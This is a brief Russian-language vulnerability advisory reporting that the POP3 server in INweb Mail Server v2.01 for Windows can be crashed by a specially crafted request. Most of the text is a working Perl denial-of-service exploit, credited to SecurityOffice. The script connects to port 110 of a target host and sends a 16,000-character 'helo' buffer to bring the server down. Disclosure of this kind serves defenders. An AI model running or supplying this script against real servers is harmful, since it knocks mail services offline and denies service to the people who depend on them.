INweb Mail Server — POP3 и SMTP почтовый сервер для Windows платформ.
POP3 server, включенный в INweb Mail Server, не в состоянии обработать некоторые типы запросов. Представляя специально обработанный запрос к POP3 серверу, удаленный атакующий может разрушить систему. Эксплоит: 

#!/usr/bin/perl -w 
use IO::Socket; 
$host = $ARGV[0]; 
$port = «110»; 
$evil = «A» x 16000; 
print «INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n»; 
print «Usage: $0 host\n»; 
print «Connecting…\n»; 
$socket = IO::Socket::INET-> 
new(Proto=>»tcp», 
PeerAddr=>$host, 
PeerPort=>$port) 
|| die «Connection failed.\n»; 
print «Attacking…\n»; 
print $socket «helo:$evil\n\n»; 
close($socket); 
print «\nConnection closed. Finished.\n\n»; 

Уязвимость обнаружена в INweb Mail Server v2.01.



Оставить мнение